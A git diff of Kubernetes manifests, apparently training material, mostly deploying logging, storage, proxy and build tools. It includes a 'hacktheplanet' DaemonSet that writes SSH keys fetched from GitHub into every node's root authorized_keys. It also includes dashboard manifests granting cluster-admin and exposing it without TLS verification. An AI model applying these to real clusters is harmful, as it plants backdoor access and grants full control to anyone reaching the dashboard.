verbs: ["get", "list", "create", "delete", "deletecollection"]
|
||||
- apiGroups: [""]
|
||||
resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"]
|
||||
verbs: ["create", "get", "update", "delete", "list"]
|
||||
- apiGroups: ["batch"]
|
||||
resources: ["cronjobs", "jobs"]
|
||||
verbs: ["create", "get", "deletecollection", "delete"]
|
||||
- apiGroups: [""]
|
||||
resources: ["pods"]
|
||||
verbs: ["list", "get", "watch"]
|
||||
- apiGroups: ["apps"]
|
||||
resources: ["statefulsets", "deployments"]
|
||||
verbs: ["*"]
|
||||
- apiGroups: ["enterprises.upmc.com"]
|
||||
resources: ["elasticsearchclusters"]
|
||||
verbs: ["*"]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: elasticsearch-operator
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
name: elasticsearch-operator
|
||||
namespace: elasticsearch-operator
|
||||
spec:
|
||||
replicas: 1
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
name: elasticsearch-operator
|
||||
spec:
|
||||
containers:
|
||||
- name: operator
|
||||
image: upmcenterprises/elasticsearch-operator:0.2.0
|
||||
imagePullPolicy: Always
|
||||
env:
|
||||
- name: NAMESPACE
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: metadata.namespace
|
||||
ports:
|
||||
- containerPort: 8000
|
||||
name: http
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
path: /live
|
||||
port: 8000
|
||||
initialDelaySeconds: 10
|
||||
timeoutSeconds: 10
|
||||
readinessProbe:
|
||||
httpGet:
|
||||
path: /ready
|
||||
port: 8000
|
||||
initialDelaySeconds: 10
|
||||
timeoutSeconds: 5
|
||||
serviceAccount: elasticsearch-operator
|
||||
167
k8s/filebeat.yaml
Normal file
167
k8s/filebeat.yaml
Normal file
@@ -0,0 +1,167 @@
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: filebeat-config
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
data:
|
||||
filebeat.yml: |-
|
||||
filebeat.config:
|
||||
inputs:
|
||||
# Mounted `filebeat-inputs` configmap:
|
||||
path: ${path.config}/inputs.d/*.yml
|
||||
# Reload inputs configs as they change:
|
||||
reload.enabled: false
|
||||
modules:
|
||||
path: ${path.config}/modules.d/*.yml
|
||||
# Reload module configs as they change:
|
||||
reload.enabled: false
|
||||
|
||||
# To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
|
||||
#filebeat.autodiscover:
|
||||
# providers:
|
||||
# - type: kubernetes
|
||||
# hints.enabled: true
|
||||
|
||||
processors:
|
||||
- add_cloud_metadata:
|
||||
|
||||
cloud.id: ${ELASTIC_CLOUD_ID}
|
||||
cloud.auth: ${ELASTIC_CLOUD_AUTH}
|
||||
|
||||
output.elasticsearch:
|
||||
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
|
||||
username: ${ELASTICSEARCH_USERNAME}
|
||||
password: ${ELASTICSEARCH_PASSWORD}
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ConfigMap
|
||||
metadata:
|
||||
name: filebeat-inputs
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
data:
|
||||
kubernetes.yml: |-
|
||||
- type: docker
|
||||
containers.ids:
|
||||
- "*"
|
||||
processors:
|
||||
- add_kubernetes_metadata:
|
||||
in_cluster: true
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: filebeat
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
spec:
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
spec:
|
||||
serviceAccountName: filebeat
|
||||
terminationGracePeriodSeconds: 30
|
||||
containers:
|
||||
- name: filebeat
|
||||
image: docker.elastic.co/beats/filebeat-oss:7.0.1
|
||||
args: [
|
||||
"-c", "/etc/filebeat.yml",
|
||||
"-e",
|
||||
]
|
||||
env:
|
||||
- name: ELASTICSEARCH_HOST
|
||||
value: elasticsearch-es.default.svc.cluster.local
|
||||
- name: ELASTICSEARCH_PORT
|
||||
value: "9200"
|
||||
- name: ELASTICSEARCH_USERNAME
|
||||
value: elastic
|
||||
- name: ELASTICSEARCH_PASSWORD
|
||||
value: changeme
|
||||
- name: ELASTIC_CLOUD_ID
|
||||
value:
|
||||
- name: ELASTIC_CLOUD_AUTH
|
||||
value:
|
||||
securityContext:
|
||||
runAsUser: 0
|
||||
# If using Red Hat OpenShift uncomment this:
|
||||
#privileged: true
|
||||
resources:
|
||||
limits:
|
||||
memory: 200Mi
|
||||
requests:
|
||||
cpu: 100m
|
||||
memory: 100Mi
|
||||
volumeMounts:
|
||||
- name: config
|
||||
mountPath: /etc/filebeat.yml
|
||||
readOnly: true
|
||||
subPath: filebeat.yml
|
||||
- name: inputs
|
||||
mountPath: /usr/share/filebeat/inputs.d
|
||||
readOnly: true
|
||||
- name: data
|
||||
mountPath: /usr/share/filebeat/data
|
||||
- name: varlibdockercontainers
|
||||
mountPath: /var/lib/docker/containers
|
||||
readOnly: true
|
||||
volumes:
|
||||
- name: config
|
||||
configMap:
|
||||
defaultMode: 0600
|
||||
name: filebeat-config
|
||||
- name: varlibdockercontainers
|
||||
hostPath:
|
||||
path: /var/lib/docker/containers
|
||||
- name: inputs
|
||||
configMap:
|
||||
defaultMode: 0600
|
||||
name: filebeat-inputs
|
||||
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
|
||||
- name: data
|
||||
hostPath:
|
||||
path: /var/lib/filebeat-data
|
||||
type: DirectoryOrCreate
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: filebeat
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: filebeat
|
||||
namespace: kube-system
|
||||
roleRef:
|
||||
kind: ClusterRole
|
||||
name: filebeat
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: filebeat
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
rules:
|
||||
- apiGroups: [""] # "" indicates the core API group
|
||||
resources:
|
||||
- namespaces
|
||||
- pods
|
||||
verbs:
|
||||
- get
|
||||
- watch
|
||||
- list
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: filebeat
|
||||
namespace: kube-system
|
||||
labels:
|
||||
k8s-app: filebeat
|
||||
---
|
||||
14
k8s/grant-admin-to-dashboard.yaml
Normal file
14
k8s/grant-admin-to-dashboard.yaml
Normal file
@@ -0,0 +1,14 @@
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: kubernetes-dashboard
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: cluster-admin
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
34
k8s/hacktheplanet.yaml
Normal file
34
k8s/hacktheplanet.yaml
Normal file
@@ -0,0 +1,34 @@
|
||||
apiVersion: apps/v1
|
||||
kind: DaemonSet
|
||||
metadata:
|
||||
name: hacktheplanet
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: hacktheplanet
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: hacktheplanet
|
||||
spec:
|
||||
volumes:
|
||||
- name: root
|
||||
hostPath:
|
||||
path: /root
|
||||
tolerations:
|
||||
- effect: NoSchedule
|
||||
operator: Exists
|
||||
initContainers:
|
||||
- name: hacktheplanet
|
||||
image: alpine
|
||||
volumeMounts:
|
||||
- name: root
|
||||
mountPath: /root
|
||||
command:
|
||||
- sh
|
||||
- -c
|
||||
- "apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
|
||||
containers:
|
||||
- name: web
|
||||
image: nginx
|
||||
|
||||
18
k8s/haproxy.cfg
Normal file
18
k8s/haproxy.cfg
Normal file
@@ -0,0 +1,18 @@
|
||||
global
|
||||
daemon
|
||||
maxconn 256
|
||||
|
||||
defaults
|
||||
mode tcp
|
||||
timeout connect 5000ms
|
||||
timeout client 50000ms
|
||||
timeout server 50000ms
|
||||
|
||||
frontend the-frontend
|
||||
bind *:80
|
||||
default_backend the-backend
|
||||
|
||||
backend the-backend
|
||||
server google.com-80 google.com:80 maxconn 32 check
|
||||
server ibm.fr-80 ibm.fr:80 maxconn 32 check
|
||||
|
||||
16
k8s/haproxy.yaml
Normal file
16
k8s/haproxy.yaml
Normal file
@@ -0,0 +1,16 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: haproxy
|
||||
spec:
|
||||
volumes:
|
||||
- name: config
|
||||
configMap:
|
||||
name: haproxy
|
||||
containers:
|
||||
- name: haproxy
|
||||
image: haproxy
|
||||
volumeMounts:
|
||||
- name: config
|
||||
mountPath: /usr/local/etc/haproxy/
|
||||
|
||||
14
k8s/ingress.yaml
Normal file
14
k8s/ingress.yaml
Normal file
@@ -0,0 +1,14 @@
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: Ingress
|
||||
metadata:
|
||||
name: cheddar
|
||||
spec:
|
||||
rules:
|
||||
- host: cheddar.A.B.C.D.nip.io
|
||||
http:
|
||||
paths:
|
||||
- path: /
|
||||
backend:
|
||||
serviceName: cheddar
|
||||
servicePort: 80
|
||||
|
||||
220
k8s/insecure-dashboard.yaml
Normal file
220
k8s/insecure-dashboard.yaml
Normal file
@@ -0,0 +1,220 @@
|
||||
# Copyright 2017 The Kubernetes Authors.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
|
||||
# Configuration to deploy release version of the Dashboard UI compatible with
|
||||
# Kubernetes 1.8.
|
||||
#
|
||||
# Example usage: kubectl create -f <this_file>
|
||||
|
||||
# ------------------- Dashboard Secret ------------------- #
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-certs
|
||||
namespace: kube-system
|
||||
type: Opaque
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Service Account ------------------- #
|
||||
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Role & Role Binding ------------------- #
|
||||
|
||||
kind: Role
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: kubernetes-dashboard-minimal
|
||||
namespace: kube-system
|
||||
rules:
|
||||
# Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
|
||||
- apiGroups: [""]
|
||||
resources: ["secrets"]
|
||||
verbs: ["create"]
|
||||
# Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
|
||||
- apiGroups: [""]
|
||||
resources: ["configmaps"]
|
||||
verbs: ["create"]
|
||||
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
|
||||
- apiGroups: [""]
|
||||
resources: ["secrets"]
|
||||
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
|
||||
verbs: ["get", "update", "delete"]
|
||||
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
|
||||
- apiGroups: [""]
|
||||
resources: ["configmaps"]
|
||||
resourceNames: ["kubernetes-dashboard-settings"]
|
||||
verbs: ["get", "update"]
|
||||
# Allow Dashboard to get metrics from heapster.
|
||||
- apiGroups: [""]
|
||||
resources: ["services"]
|
||||
resourceNames: ["heapster"]
|
||||
verbs: ["proxy"]
|
||||
- apiGroups: [""]
|
||||
resources: ["services/proxy"]
|
||||
resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
|
||||
verbs: ["get"]
|
||||
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
name: kubernetes-dashboard-minimal
|
||||
namespace: kube-system
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: kubernetes-dashboard-minimal
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Deployment ------------------- #
|
||||
|
||||
kind: Deployment
|
||||
apiVersion: apps/v1beta2
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
spec:
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
spec:
|
||||
containers:
|
||||
- name: kubernetes-dashboard
|
||||
image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.8.3
|
||||
ports:
|
||||
- containerPort: 8443
|
||||
protocol: TCP
|
||||
args:
|
||||
- --auto-generate-certificates
|
||||
# Uncomment the following line to manually specify Kubernetes API server Host
|
||||
# If not specified, Dashboard will attempt to auto discover the API server and connect
|
||||
# to it. Uncomment only if the default does not work.
|
||||
# - --apiserver-host=http://my-address:port
|
||||
volumeMounts:
|
||||
- name: kubernetes-dashboard-certs
|
||||
mountPath: /certs
|
||||
# Create on-disk volume to store exec logs
|
||||
- mountPath: /tmp
|
||||
name: tmp-volume
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
scheme: HTTPS
|
||||
path: /
|
||||
port: 8443
|
||||
initialDelaySeconds: 30
|
||||
timeoutSeconds: 30
|
||||
volumes:
|
||||
- name: kubernetes-dashboard-certs
|
||||
secret:
|
||||
secretName: kubernetes-dashboard-certs
|
||||
- name: tmp-volume
|
||||
emptyDir: {}
|
||||
serviceAccountName: kubernetes-dashboard
|
||||
# Comment the following tolerations if Dashboard must not be deployed on master
|
||||
tolerations:
|
||||
- key: node-role.kubernetes.io/master
|
||||
effect: NoSchedule
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Service ------------------- #
|
||||
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
spec:
|
||||
ports:
|
||||
- port: 443
|
||||
targetPort: 8443
|
||||
selector:
|
||||
k8s-app: kubernetes-dashboard
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
labels:
|
||||
app: dashboard
|
||||
name: dashboard
|
||||
spec:
|
||||
selector:
|
||||
matchLabels:
|
||||
app: dashboard
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: dashboard
|
||||
spec:
|
||||
containers:
|
||||
- args:
|
||||
- sh
|
||||
- -c
|
||||
- apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard.kube-system:443,verify=0
|
||||
image: alpine
|
||||
name: dashboard
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Service
|
||||
metadata:
|
||||
labels:
|
||||
app: dashboard
|
||||
name: dashboard
|
||||
spec:
|
||||
ports:
|
||||
- port: 80
|
||||
protocol: TCP
|
||||
targetPort: 80
|
||||
selector:
|
||||
app: dashboard
|
||||
type: NodePort
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: kubernetes-dashboard
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: cluster-admin
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
10
k8s/just-a-pod.yaml
Normal file
10
k8s/just-a-pod.yaml
Normal file
@@ -0,0 +1,10 @@
|
||||
apiVersion: v1
|
||||
Kind: Pod
|
||||
metadata:
|
||||
name: hello
|
||||
namespace: default
|
||||
spec:
|
||||
containers:
|
||||
- name: hello
|
||||
image: nginx
|
||||
|
||||
29
k8s/kaniko-build.yaml
Normal file
29
k8s/kaniko-build.yaml
Normal file
@@ -0,0 +1,29 @@
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: kaniko-build
|
||||
spec:
|
||||
initContainers:
|
||||
- name: git-clone
|
||||
image: alpine
|
||||
command: ["sh", "-c"]
|
||||
args:
|
||||
- |
|
||||
apk add --no-cache git &&
|
||||
git clone git://github.com/jpetazzo/container.training /workspace
|
||||
volumeMounts:
|
||||
- name: workspace
|
||||
mountPath: /workspace
|
||||
containers:
|
||||
- name: build-image
|
||||
image: gcr.io/kaniko-project/executor:latest
|
||||
args:
|
||||
- "--context=/workspace/dockercoins/rng"
|
||||
- "--insecure"
|
||||
- "--destination=registry:5000/rng-kaniko:latest"
|
||||
volumeMounts:
|
||||
- name: workspace
|
||||
mountPath: /workspace
|
||||
volumes:
|
||||
- name: workspace
|
||||
|
||||
167
k8s/kubernetes-dashboard.yaml
Normal file
167
k8s/kubernetes-dashboard.yaml
Normal file
@@ -0,0 +1,167 @@
|
||||
# Copyright 2017 The Kubernetes Authors.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
|
||||
# Configuration to deploy release version of the Dashboard UI compatible with
|
||||
# Kubernetes 1.8.
|
||||
#
|
||||
# Example usage: kubectl create -f <this_file>
|
||||
|
||||
# ------------------- Dashboard Secret ------------------- #
|
||||
|
||||
apiVersion: v1
|
||||
kind: Secret
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard-certs
|
||||
namespace: kube-system
|
||||
type: Opaque
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Service Account ------------------- #
|
||||
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Role & Role Binding ------------------- #
|
||||
|
||||
kind: Role
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: kubernetes-dashboard-minimal
|
||||
namespace: kube-system
|
||||
rules:
|
||||
# Allow Dashboard to create 'kubernetes-dashboard-key-holder' secret.
|
||||
- apiGroups: [""]
|
||||
resources: ["secrets"]
|
||||
verbs: ["create"]
|
||||
# Allow Dashboard to create 'kubernetes-dashboard-settings' config map.
|
||||
- apiGroups: [""]
|
||||
resources: ["configmaps"]
|
||||
verbs: ["create"]
|
||||
# Allow Dashboard to get, update and delete Dashboard exclusive secrets.
|
||||
- apiGroups: [""]
|
||||
resources: ["secrets"]
|
||||
resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs"]
|
||||
verbs: ["get", "update", "delete"]
|
||||
# Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
|
||||
- apiGroups: [""]
|
||||
resources: ["configmaps"]
|
||||
resourceNames: ["kubernetes-dashboard-settings"]
|
||||
verbs: ["get", "update"]
|
||||
# Allow Dashboard to get metrics from heapster.
|
||||
- apiGroups: [""]
|
||||
resources: ["services"]
|
||||
resourceNames: ["heapster"]
|
||||
verbs: ["proxy"]
|
||||
- apiGroups: [""]
|
||||
resources: ["services/proxy"]
|
||||
resourceNames: ["heapster", "http:heapster:", "https:heapster:"]
|
||||
verbs: ["get"]
|
||||
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
name: kubernetes-dashboard-minimal
|
||||
namespace: kube-system
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: kubernetes-dashboard-minimal
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Deployment ------------------- #
|
||||
|
||||
kind: Deployment
|
||||
apiVersion: apps/v1beta2
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
spec:
|
||||
replicas: 1
|
||||
revisionHistoryLimit: 10
|
||||
selector:
|
||||
matchLabels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
spec:
|
||||
containers:
|
||||
- name: kubernetes-dashboard
|
||||
image: k8s.gcr.io/kubernetes-dashboard-amd64:v1.8.3
|
||||
ports:
|
||||
- containerPort: 8443
|
||||
protocol: TCP
|
||||
args:
|
||||
- --auto-generate-certificates
|
||||
# Uncomment the following line to manually specify Kubernetes API server Host
|
||||
# If not specified, Dashboard will attempt to auto discover the API server and connect
|
||||
# to it. Uncomment only if the default does not work.
|
||||
# - --apiserver-host=http://my-address:port
|
||||
volumeMounts:
|
||||
- name: kubernetes-dashboard-certs
|
||||
mountPath: /certs
|
||||
# Create on-disk volume to store exec logs
|
||||
- mountPath: /tmp
|
||||
name: tmp-volume
|
||||
livenessProbe:
|
||||
httpGet:
|
||||
scheme: HTTPS
|
||||
path: /
|
||||
port: 8443
|
||||
initialDelaySeconds: 30
|
||||
timeoutSeconds: 30
|
||||
volumes:
|
||||
- name: kubernetes-dashboard-certs
|
||||
secret:
|
||||
secretName: kubernetes-dashboard-certs
|
||||
- name: tmp-volume
|
||||
emptyDir: {}
|
||||
serviceAccountName: kubernetes-dashboard
|
||||
# Comment the following tolerations if Dashboard must not be deployed on master
|
||||
tolerations:
|
||||
- key: node-role.kubernetes.io/master
|
||||
effect: NoSchedule
|
||||
|
||||
---
|
||||
# ------------------- Dashboard Service ------------------- #
|
||||
|
||||
kind: Service
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
labels:
|
||||
k8s-app: kubernetes-dashboard
|
||||
name: kubernetes-dashboard
|
||||
namespace: kube-system
|
||||
spec:
|
||||
ports:
|
||||
- port: 443
|
||||
targetPort: 8443
|
||||
selector:
|
||||
k8s-app: kubernetes-dashboard
|
||||
110
k8s/local-path-storage.yaml
Normal file
110
k8s/local-path-storage.yaml
Normal file
@@ -0,0 +1,110 @@
|
||||
# This is a local copy of:
|
||||
# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: local-path-storage
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: local-path-provisioner-service-account
|
||||
namespace: local-path-storage
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRole
|
||||
metadata:
|
||||
name: local-path-provisioner-role
|
||||
namespace: local-path-storage
|
||||
rules:
|
||||
- apiGroups: [""]
|
||||
resources: ["nodes", "persistentvolumeclaims"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
- apiGroups: [""]
|
||||
resources: ["endpoints", "persistentvolumes", "pods"]
|
||||
verbs: ["*"]
|
||||
- apiGroups: [""]
|
||||
resources: ["events"]
|
||||
verbs: ["create", "patch"]
|
||||
- apiGroups: ["storage.k8s.io"]
|
||||
resources: ["storageclasses"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: local-path-provisioner-bind
|
||||
namespace: local-path-storage
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: local-path-provisioner-role
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: local-path-provisioner-service-account
|
||||
namespace: local-path-storage
|
||||
---
|
||||
apiVersion: apps/v1beta2
|
||||
kind: Deployment
|
||||
metadata:
|
||||
name: local-path-provisioner
|
||||
namespace: local-path-storage
|
||||
spec:
|
||||
replicas: 1
|
||||
selector:
|
||||
matchLabels:
|
||||
app: local-path-provisioner
|
||||
template:
|
||||
metadata:
|
||||
labels:
|
||||
app: local-path-provisioner
|
||||
spec:
|
||||
serviceAccountName: local-path-provisioner-service-account
|
||||
containers:
|
||||
- name: local-path-provisioner
|
||||
image: rancher/local-path-provisioner:v0.0.8
|
||||
imagePullPolicy: Always
|
||||
command:
|
||||
- local-path-provisioner
|
||||
- --debug
|
||||
- start
|
||||
- --config
|
||||
- /etc/config/config.json
|
||||
volumeMounts:
|
||||
- name: config-volume
|
||||
mountPath: /etc/config/
|
||||
env:
|
||||
- name: POD_NAMESPACE
|
||||
valueFrom:
|
||||
fieldRef:
|
||||
fieldPath: metadata.namespace
|
||||
volumes:
|
||||
- name: config-volume
|
||||
configMap:
|
||||
name: local-path-config
|
||||
---
|
||||
apiVersion: storage.k8s.io/v1
|
||||
kind: StorageClass
|
||||
metadata:
|
||||
name: local-path
|
||||
provisioner: rancher.io/local-path
|
||||
volumeBindingMode: WaitForFirstConsumer
|
||||
reclaimPolicy: Delete
|
||||
---
|
||||
kind: ConfigMap
|
||||
apiVersion: v1
|
||||
metadata:
|
||||
name: local-path-config
|
||||
namespace: local-path-storage
|
||||
data:
|
||||
config.json: |-
|
||||
{
|
||||
"nodePathMap":[
|
||||
{
|
||||
"node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
|
||||
"paths":["/opt/local-path-provisioner"]
|
||||
}
|
||||
]
|
||||
}
|
||||
|
||||
138
k8s/metrics-server.yaml
Normal file
138
k8s/metrics-server.yaml
Normal file
@@ -0,0 +1,138 @@
|
||||
kind: ClusterRole
|
||||
apiVersion: rbac.authorization.k8s.io/v1
|
||||
metadata:
|
||||
name: system:aggregated-metrics-reader
|
||||
labels:
|
||||
rbac.authorization.k8s.io/aggregate-to-view: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-edit: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-admin: "true"
|
||||
rules:
|
||||
- apiGroups: ["metrics.k8s.io"]
|
||||
resources: ["pods"]
|
||||
verbs: ["get", "list", "watch"]
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: ClusterRoleBinding
|
||||
metadata:
|
||||
name: metrics-server:system:auth-delegator
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: ClusterRole
|
||||
name: system:auth-delegator
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
---
|
||||
apiVersion: rbac.authorization.k8s.io/v1beta1
|
||||
kind: RoleBinding
|
||||
metadata:
|
||||
name: metrics-server-auth-reader
|
||||
namespace: kube-system
|
||||
roleRef:
|
||||
apiGroup: rbac.authorization.k8s.io
|
||||
kind: Role
|
||||
name: extension-apiserver-authentication-reader
|
||||
subjects:
|
||||
- kind: ServiceAccount
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
---
|
||||
apiVersion: apiregistration.k8s.io/v1beta1
|
||||
kind: APIService
|
||||
metadata:
|
||||
name: v1beta1.metrics.k8s.io
|
||||
spec:
|
||||
service:
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
group: metrics.k8s.io
|
||||
version: v1beta1
|
||||
insecureSkipTLSVerify: true
|
||||
groupPriorityMinimum: 100
|
||||
versionPriority: 100
|
||||
---
|
||||
apiVersion: v1
|
||||
kind: ServiceAccount
|
||||
metadata:
|
||||
name: metrics-server
|
||||
namespace: kube-system
|
||||
---
|
||||
apiVersion: extensions/v1beta1
|
||||
kind: Deployment
|
||||
metadata:
|
||||
name: metrics-server
|
||||
